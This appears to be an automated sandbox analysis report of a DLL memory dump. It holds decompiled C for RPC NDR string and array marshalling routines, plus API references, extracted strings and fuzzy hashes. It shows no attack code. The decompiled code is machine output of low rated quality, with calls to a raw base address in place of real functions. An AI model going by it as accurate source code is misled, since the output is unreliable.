                                                                                                							__eflags =  *(__eax + 0x3c) -  *((intOrPtr*)(__ecx + 0x44));
                                                                                                							if( *(__eax + 0x3c) !=  *((intOrPtr*)(__ecx + 0x44))) {
                                                                                                								__eax = _a8;
                                                                                                								__ecx =  *(__eax + 0x3c);
                                                                                                								_push( *(__eax + 0x3c));
                                                                                                								__edx = _a8;
                                                                                                								__eax =  *(__edx + 0x44);
                                                                                                								_push( *(__edx + 0x44));
                                                                                                								_push("buffer size %d must equal memory size %ld for non-sized conformant strings\n");
                                                                                                								0x6eda0000();
                                                                                                								__esp = __esp + 0xc;
                                                                                                								_push(0x6c6);
                                                                                                								__imp__RpcRaiseException();
                                                                                                							}
                                                                                                						}
                                                                                                						__ecx = _a8;
                                                                                                						__eflags =  *(__ecx + 0x40);
                                                                                                						if( *(__ecx + 0x40) != 0) {
                                                                                                							__edx = _a8;
                                                                                                							__eax =  *(__edx + 0x40);
                                                                                                							_push( *(__edx + 0x40));
                                                                                                							_push("conformant strings can\'t have Offset (%d)\n");
                                                                                                							0x6eda0000();
                                                                                                							__esp = __esp + 8;
                                                                                                							_push(0x6c6);
                                                                                                							__imp__RpcRaiseException();
                                                                                                						}
                                                                                                						__ecx = _a8;
                                                                                                						__edx =  *(_a8 + 0x3c);
                                                                                                						__eax = _v12 & 0x0000ffff;
                                                                                                						_v24 = E6EDAAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
                                                                                                						__ecx = _a8;
                                                                                                						__edx =  *(_a8 + 0x44);
                                                                                                						__eax = _v12 & 0x0000ffff;
                                                                                                						_v16 = E6EDAAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x44));
                                                                                                						__ecx = _v12 & 0x0000ffff;
                                                                                                						__edx = _v16;
                                                                                                						_a8 = E6EDAB0C0(_v12 & 0x0000ffff, _a8, _v16, _v12 & 0x0000ffff);
                                                                                                						__ecx = _a28 & 0x000000ff;
                                                                                                						__eflags = _a28 & 0x000000ff;
                                                                                                						if((_a28 & 0x000000ff) == 0) {
                                                                                                							L44:
                                                                                                							__eax = _v16;
                                                                                                							return _v16;
                                                                                                						} else {
                                                                                                							__edx = _a20 & 0x000000ff;
                                                                                                							__eflags = _a20 & 0x000000ff;
                                                                                                							if((_a20 & 0x000000ff) == 0) {
                                                                                                								__eax = _a24 & 0x000000ff;
                                                                                                								__eflags = _a24 & 0x000000ff;
                                                                                                								if((_a24 & 0x000000ff) == 0) {
                                                                                                									L36:
                                                                                                									__ecx = _a12;
                                                                                                									__eflags =  *_a12;
                                                                                                									if( *_a12 == 0) {
                                                                                                										__edx = _v24;
                                                                                                										_push(_v24);
                                                                                                										__eax = _a8;
                                                                                                										_push(__eax);
                                                                                                										__imp__NdrAllocate();
                                                                                                										__ecx = _a12;
                                                                                                										 *_a12 = __eax;
                                                                                                									}
                                                                                                									L38:
                                                                                                									__edx = _a12;
                                                                                                									__eax = _a8;
                                                                                                									__ecx =  *_a12;
                                                                                                									__eflags =  *_a12 -  *((intOrPtr*)(__eax + 4));
                                                                                                									if( *_a12 !=  *((intOrPtr*)(__eax + 4))) {
                                                                                                										__ecx = _v16;
                                                                                                										__edx = _a12;
                                                                                                										__eax =  *_a12;
                                                                                                										__ecx = _a8;
                                                                                                										__eax = E6EDAAFA0(_a8,  *_a12, _v16);
                                                                                                									} else {
                                                                                                										__edx = _v16;
                                                                                                										_a8 = E6EDAAF00(_a8, _v16);
                                                                                                									}
                                                                                                									__edx = _a16;
                                                                                                									__eax =  *_a16 & 0x000000ff;
                                                                                                									__eflags = __eax - 0x22;
                                                                                                									if(__eax != 0x22) {
                                                                                                										__eax = _a12;
                                                                                                										__ecx =  *__eax;
                                                                                                										_push( *__eax);
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 4;
                                                                                                										_push(__eax);
                                                                                                										_push("string=%s\n");
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 8;
                                                                                                									} else {
                                                                                                										__ecx = _a12;
                                                                                                										__edx =  *_a12;
                                                                                                										_push( *_a12);
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 4;
                                                                                                										_push(__eax);
                                                                                                										_push("string=%s\n");
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 8;
                                                                                                									}
                                                                                                									goto L44;
                                                                                                								}
                                                                                                								__ecx = _a8;
                                                                                                								__edx =  *(__ecx + 0x20) & 0x000000ff;
                                                                                                								__eflags =  *(__ecx + 0x20) & 0x000000ff;
                                                                                                								if(( *(__ecx + 0x20) & 0x000000ff) != 0) {
                                                                                                									goto L36;
                                                                                                								}
                                                                                                								__eax = _a12;
                                                                                                								__eflags =  *_a12;
                                                                                                								if( *_a12 != 0) {
                                                                                                									goto L36;
                                                                                                								}
                                                                                                								__ecx = _a8;
                                                                                                								__edx = _a8;
                                                                                                								__eax =  *(__ecx + 0x3c);
                                                                                                								__eflags =  *(__ecx + 0x3c) -  *(__edx + 0x44);
                                                                                                								if( *(__ecx + 0x3c) !=  *(__edx + 0x44)) {
                                                                                                									goto L36;
                                                                                                								}
                                                                                                								__ecx = _a12;
                                                                                                								__edx = _a8;
                                                                                                								__eax =  *(__edx + 4);
                                                                                                								 *_a12 =  *(__edx + 4);
                                                                                                								goto L38;
                                                                                                							}
                                                                                                							__eax = _v24;
                                                                                                							_push(__eax);
                                                                                                							__ecx = _a8;
                                                                                                							_push(_a8);
                                                                                                							__imp__NdrAllocate();
                                                                                                							__edx = _a12;
                                                                                                							 *_a12 = __eax;
                                                                                                							goto L38;
                                                                                                						}
                                                                                                					case 4:
                                                                                                						goto L57;
                                                                                                				}
                                                                                                			}














                                                                                                0x6edadc3f
                                                                                                0x6edadc3f
                                                                                                0x6edadc47
                                                                                                0x6edadc4c
                                                                                                0x6edadc67
                                                                                                0x6edadc6a
                                                                                                0x6edadc6d
                                                                                                0x6edadc70
                                                                                                0x6edadc90
                                                                                                0x6edadc93
                                                                                                0x6edadc95
                                                                                                0x6edadc96
                                                                                                0x6edadc9b
                                                                                                0x6edadc9e
                                                                                                0x6edadc9f
                                                                                                0x6edadca4
                                                                                                0x6edadca9
                                                                                                0x6edadc72
                                                                                                0x6edadc72
                                                                                                0x6edadc75
                                                                                                0x6edadc77
                                                                                                0x6edadc78
                                                                                                0x6edadc7d
                                                                                                0x6edadc80
                                                                                                0x6edadc81
                                                                                                0x6edadc86
                                                                                                0x6edadc8b
                                                                                                0x6edadc8b
                                                                                                0x00000000
                                                                                                0x6edadc70
                                                                                                0x6edadbe9
                                                                                                0x6edadbec
                                                                                                0x6edadbf0
                                                                                                0x6edadbf2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edadbf4
                                                                                                0x6edadbf7
                                                                                                0x6edadbfa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edadbfc
                                                                                                0x6edadbff
                                                                                                0x6edadc02
                                                                                                0x6edadc05
                                                                                                0x6edadc08
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edadc0a
                                                                                                0x6edadc0d
                                                                                                0x6edadc10
                                                                                                0x6edadc13
                                                                                                0x00000000
                                                                                                0x6edadc13
                                                                                                0x6edadbcc
                                                                                                0x6edadbcf
                                                                                                0x6edadbd0
                                                                                                0x6edadbd3
                                                                                                0x6edadbd4
                                                                                                0x6edadbda
                                                                                                0x6edadbdd
                                                                                                0x00000000
                                                                                                0x6edadbdd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • _memmove.LIBCMT ref: 6EDAD989
                                                                                                • RpcRaiseException.RPCRT4(000006F7,?,?,?,?,6EDA3992,?), ref: 6EDADDFE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memmove
                                                                                                • String ID: copying %p to %p$unknown array format 0x%x
                                                                                                • API String ID: 4056999889-2029649059
                                                                                                • Opcode ID: 047cb781484906954ea2ec8738ab1d7733ecaea259bd70c7e4c2a07a7f80fa71
                                                                                                • Instruction ID: 990623ca08f11278e996ef68157bdf7052333d24fed5735807ef511ed4110de1
                                                                                                • Opcode Fuzzy Hash: 047cb781484906954ea2ec8738ab1d7733ecaea259bd70c7e4c2a07a7f80fa71
                                                                                                • Instruction Fuzzy Hash: CBA17FB5A04149AFCB44CFA8D8909AE7BB5BF89308F04C559FD599B341E335EA11CBB0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 21%
                                                                                                			E6EDA1440(void* _a4, signed int* _a8, signed short* _a12) {
                                                                                                				signed char* _v8;
                                                                                                				signed char* _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				intOrPtr _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				intOrPtr _v44;
                                                                                                				intOrPtr _t147;
                                                                                                				signed short* _t162;
                                                                                                				intOrPtr _t225;
                                                                                                				void* _t262;
                                                                                                				void* _t263;
                                                                                                				void* _t264;
                                                                                                				void* _t265;
                                                                                                
                                                                                                				_v8 = 0;
                                                                                                				_v12 = 0;
                                                                                                				_v44 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                                				_v28 = 0;
                                                                                                				_v20 = 0;
                                                                                                				_v16 = 0;
                                                                                                				_v24 = 0;
                                                                                                				0x6eda0000("(%p,%p,%p)\n", _a4, _a8, _a12);
                                                                                                				_t263 = _t262 + 0x10;
                                                                                                				_t225 = _a4;
                                                                                                				_t267 =  *((intOrPtr*)(_t225 + 0x34));
                                                                                                				if( *((intOrPtr*)(_t225 + 0x34)) == 0) {
                                                                                                					_v32 =  *((intOrPtr*)(_a4 + 0x30));
                                                                                                					_v36 =  *((intOrPtr*)(_a4 + 0x14));
                                                                                                					 *((intOrPtr*)(_a4 + 0x14)) =  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8));
                                                                                                					 *((intOrPtr*)(_a4 + 0x30)) = 1;
                                                                                                					E6EDA5070(_t267, _a4, _a8, _a12);
                                                                                                					 *((intOrPtr*)(_a4 + 0x30)) = _v32;
                                                                                                					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14));
                                                                                                					0x6eda0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x34)) -  *((intOrPtr*)(_a4 + 4)));
                                                                                                					_t263 = _t263 + 8;
                                                                                                					_v28 = 1;
                                                                                                					 *((intOrPtr*)(_a4 + 0x14)) = _v36;
                                                                                                				}
                                                                                                				E6EDA7400(_a4 + 4, _a4 + 4, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
                                                                                                				_t264 = _t263 + 8;
                                                                                                				_a12 =  &(_a12[2]);
                                                                                                				if( *_a12 != 0) {
                                                                                                					_v8 = _a12 +  *_a12;
                                                                                                				}
                                                                                                				_a12 =  &(_a12[1]);
                                                                                                				if(( *_a12 & 0x0000ffff) != 0) {
                                                                                                					_v12 = _a12 + ( *_a12 & 0x0000ffff);
                                                                                                				}
                                                                                                				_a12 =  &(_a12[1]);
                                                                                                				 *((intOrPtr*)(_a4 + 0x1c)) = _a8;
                                                                                                				if(_v8 != 0) {
                                                                                                					_t162 = _a12;
                                                                                                					0x6eda0000(_a4, _t162);
                                                                                                					_v40 = _t162;
                                                                                                					E6EDAD120( *_v8 & 0x000000ff, _a4, _a8 + _v40, _v8);
                                                                                                					_t264 = _t264 + 0x18;
                                                                                                					_v16 =  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                					_v20 =  *((intOrPtr*)(_a4 + 0x44));
                                                                                                					_v24 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                                				}
                                                                                                				_t147 = E6EDA8F30(_a4, _a8, _a12, _v12);
                                                                                                				_t265 = _t264 + 0x10;
                                                                                                				_a8 = _t147;
                                                                                                				if(_v8 != 0) {
                                                                                                					 *((intOrPtr*)(_a4 + 0x3c)) = _v16;
                                                                                                					 *((intOrPtr*)(_a4 + 0x44)) = _v20;
                                                                                                					 *((intOrPtr*)(_a4 + 0x40)) = _v24;
                                                                                                					E6EDAD360( *_v8 & 0x000000ff, _a4, _a8, _v8, 1);
                                                                                                					_t265 = _t265 + 0x14;
                                                                                                				}
                                                                                                				 *((intOrPtr*)(_a4 + 0x1c)) = _v44;
                                                                                                				if(_v28 != 0) {
                                                                                                					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
                                                                                                					 *((intOrPtr*)(_a4 + 0x34)) = 0;
                                                                                                				}
                                                                                                				do {
                                                                                                					0x6eda0000("buffer=%d/%d\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)),  *((intOrPtr*)(_a4 + 0x14)));
                                                                                                					_t265 = _t265 + 0xc;
                                                                                                					if( *((intOrPtr*)(_a4 + 4)) >  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14))) {
                                                                                                						0x6eda0000("buffer overflow %d bytes\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14)));
                                                                                                						_t265 = _t265 + 8;
                                                                                                					}
                                                                                                				} while (0 != 0);
                                                                                                				return 0;
                                                                                                			}





















                                                                                                APIs
                                                                                                • _NdrComplexStructBufferSize@12.SOZZ(00000000,00000000,00000000), ref: 6EDA14DB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: BufferComplexSize@12Struct
                                                                                                • String ID: (%p,%p,%p)$buffer overflow %d bytes$buffer=%d/%d$difference = 0x%x
                                                                                                • API String ID: 1319815426-1841717460
                                                                                                • Opcode ID: 5c01ae2f83278513e513ada470f1f2d6280f26fcb4de457532425256e96c91bb
                                                                                                • Instruction ID: 29f6def6865f87a760bb96e143d4613e8b8601c347ed963d4e318b85667b5813
                                                                                                • Opcode Fuzzy Hash: 5c01ae2f83278513e513ada470f1f2d6280f26fcb4de457532425256e96c91bb
                                                                                                • Instruction Fuzzy Hash: 18A1D8B4A00209EFCB48CF98C590AAEBBB5FF88354F148558ED599B345D731EA91CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • buffer overflow - saved_buffer = %p, BufferEnd = %p, xrefs: 6EDAEE65
                                                                                                • buffer overflow %d bytes, xrefs: 6EDAEEFA
                                                                                                • buffer=%d/%d, xrefs: 6EDAEEC0
                                                                                                • no marshaller for embedded type %02x, xrefs: 6EDAEF64
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: buffer overflow %d bytes$buffer overflow - saved_buffer = %p, BufferEnd = %p$buffer=%d/%d$no marshaller for embedded type %02x
                                                                                                • API String ID: 3997070919-2685964157
                                                                                                • Opcode ID: 4b66d287588d5459a043c7bc99351cb447582f49fa155c09e0facc26dd03acce
                                                                                                • Instruction ID: e09fc98da3c91d2800e2227fbccae0f727b953d3c69b3029485840f0545f33d3
                                                                                                • Opcode Fuzzy Hash: 4b66d287588d5459a043c7bc99351cb447582f49fa155c09e0facc26dd03acce
                                                                                                • Instruction Fuzzy Hash: 94811AB4A04109EFCB04CF98C490AAEBBB6EF89344F14C158FD599B355D731EA91CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • buffer=%d/%d, xrefs: 6EDAEC03
                                                                                                • buffer overflow - saved_buffer = %p, BufferEnd = %p, xrefs: 6EDAEC85
                                                                                                • buffer overflow %d bytes, xrefs: 6EDAEC3D
                                                                                                • no marshaller for embedded type %02x, xrefs: 6EDAECE0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: buffer overflow %d bytes$buffer overflow - saved_buffer = %p, BufferEnd = %p$buffer=%d/%d$no marshaller for embedded type %02x
                                                                                                • API String ID: 3997070919-2685964157
                                                                                                • Opcode ID: d52c56668665e0d11587644043e69389bd0c36ed3694fb02c0bfe41df55a6c3a
                                                                                                • Instruction ID: 754b17b0a93d57b78580ee284fb86989b355d0f61fa52c38e9c9e923a210c5ac
                                                                                                • Opcode Fuzzy Hash: d52c56668665e0d11587644043e69389bd0c36ed3694fb02c0bfe41df55a6c3a
                                                                                                • Instruction Fuzzy Hash: 3E813F74A00109EFCB04CF98C490AAEBBB6FF89344F14C558EE599B345D731EA91CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7,?,?,?,?,6EDA139F,?), ref: 6EDAD328
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: string=%s$string=%s$unknown array format 0x%x
                                                                                                • API String ID: 3997070919-3150054447
                                                                                                • Opcode ID: 3c4d76ad0b1f7ce7bfc6904fbd971a36b4a805b8a9a61e3e895872eb1c729a63
                                                                                                • Instruction ID: a2b7341bea8effba8ec4951aeeffbbe840a25aa8a720bdfc235202b750f10607
                                                                                                • Opcode Fuzzy Hash: 3c4d76ad0b1f7ce7bfc6904fbd971a36b4a805b8a9a61e3e895872eb1c729a63
                                                                                                • Instruction Fuzzy Hash: 726130F5900109AFDB04CFA8D851AAF77B9AF49308F048559FE199B341E735EA11CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7,?,?,?,?,00000001), ref: 6EDACE39
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: string=%s$string=%s$unknown array format 0x%x
                                                                                                • API String ID: 3997070919-3150054447
                                                                                                • Opcode ID: 1afb2561f2a85ba689b1a9fdb55df319f62bf13a8c4f90d56501d04edd393767
                                                                                                • Instruction ID: 425df66cd486e174037b06c71a4adde142435ad3961bfbb141af84b94a55e3ce
                                                                                                • Opcode Fuzzy Hash: 1afb2561f2a85ba689b1a9fdb55df319f62bf13a8c4f90d56501d04edd393767
                                                                                                • Instruction Fuzzy Hash: DF6132B5A00149AFDB04DF9CD880AAF77B9AF48218F048559FE199B341E635EB11CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA8744
                                                                                                • _NdrClientContextMarshall@12.SOZZ(?,?,00000000), ref: 6EDA8794
                                                                                                Strings
                                                                                                • invalid format type %x, xrefs: 6EDA8732
                                                                                                • flags: 0x%02x, xrefs: 6EDA875A
                                                                                                • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6EDA8713
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ClientContextExceptionMarshall@12Raise
                                                                                                • String ID: flags: 0x%02x$invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                                • API String ID: 624206959-1391298755
                                                                                                • Opcode ID: 82e9b46dc980bb03a6cd8959d341a4147774589123fd4262f755a3a126a95897
                                                                                                • Instruction ID: ca07d523569b8da1fc47eaa6072bd87996848c751e04f35380bb1bd2f47cf2b2
                                                                                                • Opcode Fuzzy Hash: 82e9b46dc980bb03a6cd8959d341a4147774589123fd4262f755a3a126a95897
                                                                                                • Instruction Fuzzy Hash: 1B11D6B56041C59BD744CFA9CC61FBA7BA9AF46240F048598FDA48B281D635D610C7B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 21%
                                                                                                			E6EDAA540(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                				void* _t101;
                                                                                                				void* _t174;
                                                                                                
                                                                                                				_t103 = __ecx;
                                                                                                				if(_a8 == 0) {
                                                                                                					L3:
                                                                                                					E6EDA73D0(_t103, _a4 + 4, 4);
                                                                                                					if( &(( *(_a4 + 4))[8]) >  *((intOrPtr*)(_a4 + 0xc))) {
                                                                                                						__imp__RpcRaiseException(0x6f7);
                                                                                                					}
                                                                                                					 *(_a4 + 0x40) = ( *( *(_a4 + 4)) & 0xff | (( *(_a4 + 4))[1] & 0xff) << 0x00000008) & 0xffff | ((( *(_a4 + 4))[2] & 0xff | (( *(_a4 + 4))[3] & 0xff) << 0x00000008) & 0xffff) << 0x00000010;
                                                                                                					 *(_a4 + 4) =  &(( *(_a4 + 4))[4]);
                                                                                                					0x6eda0000("offset is %d\n",  *(_a4 + 0x40));
                                                                                                					 *(_a4 + 0x44) = ( *( *(_a4 + 4)) & 0xff | (( *(_a4 + 4))[1] & 0xff) << 0x00000008) & 0xffff | ((( *(_a4 + 4))[2] & 0xff | (( *(_a4 + 4))[3] & 0xff) << 0x00000008) & 0xffff) << 0x00000010;
                                                                                                					 *(_a4 + 4) =  &(( *(_a4 + 4))[4]);
                                                                                                					0x6eda0000("variance is %d\n",  *(_a4 + 0x44));
                                                                                                					if( *(_a4 + 0x44) > _a12 ||  *(_a4 + 0x44) +  *(_a4 + 0x40) > _a12) {
                                                                                                						0x6eda0000("invalid array bound(s): ActualCount = %d, Offset = %d, MaxValue = %d\n",  *(_a4 + 0x44),  *(_a4 + 0x40), _a12);
                                                                                                						__imp__RpcRaiseException(0x6c6);
                                                                                                						return 0;
                                                                                                					} else {
                                                                                                						L8:
                                                                                                						return E6EDAA440(_a4, _a8);
                                                                                                					}
                                                                                                				}
                                                                                                				_t101 = E6EDAA410(__ecx, _a8);
                                                                                                				_t174 = _t174 + 4;
                                                                                                				if(_t101 != 0) {
                                                                                                					goto L3;
                                                                                                				}
                                                                                                				 *(_a4 + 0x40) = 0;
                                                                                                				 *(_a4 + 0x44) =  *(_a4 + 0x3c);
                                                                                                				goto L8;
                                                                                                			}






                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6EDA3992), ref: 6EDAA59B
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDAA713
                                                                                                Strings
                                                                                                • invalid array bound(s): ActualCount = %d, Offset = %d, MaxValue = %d, xrefs: 6EDAA701
                                                                                                • variance is %d, xrefs: 6EDAA6C6
                                                                                                • offset is %d, xrefs: 6EDAA62D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: invalid array bound(s): ActualCount = %d, Offset = %d, MaxValue = %d$offset is %d$variance is %d
                                                                                                • API String ID: 3997070919-604998095
                                                                                                • Opcode ID: eab2292455a35ede9138487c2c5d370ba0d44589cb4567e04a53724f05962aef
                                                                                                • Instruction ID: ab5f5077732cc9dfa7ea1bc1362aa53acf68279111ab9e3209e9e412e08fff1c
                                                                                                • Opcode Fuzzy Hash: eab2292455a35ede9138487c2c5d370ba0d44589cb4567e04a53724f05962aef
                                                                                                • Instruction Fuzzy Hash: 6651AF742041559BD704CF49C490A75BFE3EFC9355F08C2A9F9894F386D239EA51DBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 44%
                                                                                                			E6EDA3D00(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
                                                                                                				signed char* _v8;
                                                                                                				signed int _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				signed char* _v20;
                                                                                                				intOrPtr _t81;
                                                                                                				void* _t124;
                                                                                                				void* _t125;
                                                                                                				void* _t126;
                                                                                                
                                                                                                				_v8 = _a12;
                                                                                                				0x6eda0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                                				_t125 = _t124 + 0x14;
                                                                                                				if(( *_v8 & 0x000000ff) == 0x1d || ( *_v8 & 0x000000ff) == 0x1e) {
                                                                                                					E6EDA73D0(_a4 + 4, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
                                                                                                					_t126 = _t125 + 8;
                                                                                                					if(( *_v8 & 0x000000ff) != 0x1d) {
                                                                                                						_v20 = _a12;
                                                                                                						_v12 =  *((intOrPtr*)(_v20 + 2));
                                                                                                						_a12 = _v20 + 6;
                                                                                                					} else {
